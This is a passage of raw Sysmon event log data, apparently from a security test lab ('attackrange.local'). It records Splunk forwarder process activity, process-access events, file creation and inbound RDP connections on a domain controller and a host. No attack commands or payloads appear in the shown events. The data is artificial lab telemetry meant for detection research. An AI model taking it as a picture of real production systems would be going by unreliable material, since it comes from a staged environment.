Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.043{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-883E-6151-E779-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:46.028{5EBD8912-883E-6151-E779-00000000FC01}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976415Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:47.869{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4298MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976414Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:47.790{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C4C078D6473D5785438359636A14DE,SHA256=10F73BAF7318E9DCB905F061C89885FB9139706D09BB0CBC249084B49AD817F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:47.427{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A90CA2ECC4EF8842F6C662A2EDADA269,SHA256=4FC0874AFDC7155679DF6416179661B711481580A6293FB5E4962642B604422C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:45.937{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60951-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976413Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:47.618{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D5BEC005AF1B710EFAEAE6E6CD688EC,SHA256=7BA7F6D95F22EF7FA6A4C50F7F3EAC5107195BDC3CCE03511F1B9747B52C8DE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976412Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:44.129{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60464-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:47.095{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B172DCDB3955AE2CF6816552385DAF65,SHA256=25B2B76DF140C69B24DAAA9E752D9D28C826C36F9B7E7CAB397E327681B85C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976416Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:48.823{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50161869F3605E935E99814459221EDB,SHA256=A2C55198FB7BADCA8378CF39EAB3B38B83411A29BD54A52360DADF2C6C025355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:48.427{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C13F74ECE8FE79A7F36D2603762E375E,SHA256=1C6129CF0FB80277B06DF8F37D8837B9A3022D54624D4C5C45C875D02EC5A98D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976419Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:49.870{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6E1948370C1B27DA85BA938142A21D,SHA256=5BF6417739FE3E73A8A205E4511AA906458D401A73E27F4714541D052146C641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:49.460{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=486995291590FFC358FB91B35CCC1043,SHA256=4D8C2D65DF6D8789EDCF8DF7BA355CA1A20D515DFC13EF6A247A9DA79FBCC15A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976418Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:46.300{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-4478-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976417Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:45.759{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54952-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976420Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:50.917{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=770DF6759879EFA01F94A8A4415D9250,SHA256=673B2FAEF12DBAB537696FC79E326EB9A9C74F201B1A07D8289A01A0A1589D81,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:48.853{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49212-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:50.497{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C1DC110DB85A3E4295ECD3B81DA596,SHA256=EE05E4522ACFE4755753A04C296030AC394131E90D2619D96C220C1E747382C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:51.527{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF22973B2D078B3BF21CCCFC18C8D948,SHA256=CCFB329B5D081A196E7D0909DFA559A824061A7684FB9F8F4B79463104A7262B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976422Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:48.458{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63107-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976421Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:51.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7181E13373F39E5A1D704E3FE8A73AB,SHA256=AA4027CF44D310D385A253C5EF11BB49031375A9B2316324453659C22AEE8FBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:52.542{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC6E268DF3F498ADCAD4D59EFAAD3C3C,SHA256=2B2159CD93CFDD5102CE64C3505B73DF335B62170632E5705EEA5000A673EEE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976424Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:48.779{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59252-false10.0.1.12-8000- 23542300x8000000000000000976423Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:52.135{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C67E8B262B1A9286A27A8296FD551138,SHA256=29E71C36A80EBBE31525D0E0F78042A29865A728EBF8BC2A33457E24AAC62729,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:53.560{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A129466EF08E414C503F6EC73CEE64,SHA256=C9D94D838C4D9216E5F9B84D82605F94372E1569D8402ABC973A9DC8CAF3B585,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976425Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:53.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACAC6C62ED8041C6A32938B662D809A4,SHA256=ACBE7B4AC33491570D2CD25BEB0E660DEA6AD0BCB98E4F47C192E337EE3F8391,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.910{5EBD8912-8846-6151-E979-00000000FC01}48085172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8846-6151-E979-00000000FC01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8846-6151-E979-00000000FC01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.741{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8846-6151-E979-00000000FC01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.726{5EBD8912-8846-6151-E979-00000000FC01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.578{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E247376DF1A2C9C26C974853F31C52F3,SHA256=144CA2716184DEF851F9C7490E17055556807EEDD7E66ADBE0E391C93B547374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976426Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:54.307{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C0EFBCD3C5992D1EA1B6283993F85EC,SHA256=1221D07675FF8440F5D95115A08B08E98CC0AB940310794DC63E89E9CAC966AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.241{5EBD8912-8846-6151-E879-00000000FC01}24764860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.062{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8846-6151-E879-00000000FC01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.059{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:54.059{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\